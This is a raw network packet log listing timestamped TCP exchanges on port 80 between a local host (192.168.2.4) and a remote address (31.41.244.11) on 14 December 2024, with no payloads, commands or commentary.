Dec 14, 2024 23:58:21.421247005 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.421294928 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.421360970 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.421421051 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.422333002 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.422385931 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.422454119 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.422513962 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.423448086 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.423501968 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.423568964 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.423633099 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.424592018 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.424645901 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.424696922 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.424742937 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.425614119 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.425668955 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.425734997 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.425786972 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.426723003 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.426775932 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.426843882 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.426897049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.427804947 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.427858114 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.427925110 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.427977085 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.428920984 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.428972960 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.429039955 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.429136038 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.430012941 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.430111885 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.430149078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.430192947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.431113958 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.431206942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.431304932 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.431360960 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.432188034 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.432240963 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.432321072 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.432374001 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.433291912 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.433342934 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.433456898 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.433512926 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.434391975 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.434456110 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.434523106 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.434581995 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.435487032 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.435535908 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.435597897 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.435646057 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.436600924 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.436651945 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.436784029 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.436837912 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.437669992 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.437740088 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.437808037 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.437855959 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.438777924 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.438836098 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.438901901 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.438954115 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.439918041 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.439999104 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.440043926 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.440094948 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.440998077 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.441066027 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.441134930 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.441185951 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.442091942 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.442145109 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.442190886 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.442245960 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.443161011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.443216085 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.443296909 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.443392038 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.444288015 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.444405079 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.444432974 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.444463015 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.445394993 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.445437908 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.445496082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.445549965 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.446445942 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.446505070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.446567059 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.446620941 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.447572947 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.447619915 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.447689056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.447738886 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.448674917 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.448725939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.448801994 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.448854923 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.449789047 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.449836016 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.449904919 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.449955940 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.450849056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.450928926 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.450989008 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.451051950 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.451958895 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.452023983 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.452100039 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.452156067 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.453059912 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.453124046 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.453243017 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.453325987 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.454121113 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.454185009 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.454267025 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.454327106 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.455245018 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.455333948 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.455377102 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.455430984 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.456351042 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.456419945 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.456455946 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.456507921 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.457425117 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.457469940 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.457549095 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.457597971 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.458527088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.458587885 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.458652973 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.458709955 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.459707022 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.459789991 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.459846973 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.459903955 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.460834026 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.460889101 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.460906029 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.460972071 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.462028027 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.462085962 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.462167025 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.462219954 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.462897062 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.462949991 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.463030100 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.463134050 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.464026928 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.464075089 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.464150906 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.464240074 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.465121031 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.465183020 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.465250015 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.465312004 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.466212034 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.466281891 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.466326952 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.466403961 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.467297077 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.467356920 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.467427015 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.467478037 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.468419075 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.468476057 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.468563080 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.468615055 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.469492912 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.469544888 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.469624043 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.469676971 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.470607996 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.470660925 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.470725060 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.470776081 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.471673012 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.471726894 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.606291056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.606355906 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.606787920 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.606832981 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.606854916 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.606869936 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.606873989 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.606919050 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.607628107 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.607686996 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.607769012 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.607822895 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.608727932 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.608797073 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.608851910 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.608908892 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.609795094 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.609920025 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.609967947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.610896111 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.610946894 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.611018896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.611109972 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.611985922 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.612042904 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.612101078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.612183094 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.613075018 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.613197088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.613243103 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.614181995 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.614233017 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.614288092 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.614717007 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.615263939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.615329981 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.615384102 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.615437984 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.616426945 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.616476059 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.616493940 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.616540909 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.617469072 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.617527962 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.617681980 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.617752075 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.618598938 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.618642092 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.618771076 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.618824005 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.619673967 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.619734049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.619831085 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.619874954 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.620807886 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.620857954 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.620939016 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.620981932 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.621891975 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.622036934 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.622068882 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.622098923 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.622973919 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.623040915 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.623137951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.623184919 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.624068022 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.624119043 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.624181986 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.624244928 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.625201941 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.625263929 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.625313997 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.625363111 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.626252890 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.626322985 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.626369953 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.626420021 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.627403021 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.627465963 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.627511024 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.627562046 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.628463984 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.628551006 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.628587961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.628631115 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.629543066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.629602909 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.629653931 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.629699945 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.630642891 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.630698919 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.630758047 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.630824089 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.631727934 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.631778955 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.631863117 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.631908894 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.632817030 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.632869959 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.632930040 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.633065939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.633971930 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.634028912 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.634073973 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.634119987 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.635011911 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.635072947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.635140896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.635209084 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.636122942 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.636183023 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.636290073 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.636348009 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.637216091 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.637264013 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.637324095 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.637371063 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.638304949 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.638355970 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.638425112 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.638473988 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.639414072 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.639481068 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.639556885 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.639604092 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.640552044 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.640595913 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.640664101 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.640712023 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.641561985 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.641613960 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.641755104 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.642101049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.642683029 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.642735004 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.642828941 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.642879009 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.643785000 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.643840075 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.643903017 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.644076109 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.644891024 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.644959927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.644995928 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.645112038 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.645982027 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.646032095 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.646140099 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.646286011 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.647929907 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.647945881 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.647985935 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.648015976 CET	49793	80	192.168.2.4	31.41.244.11
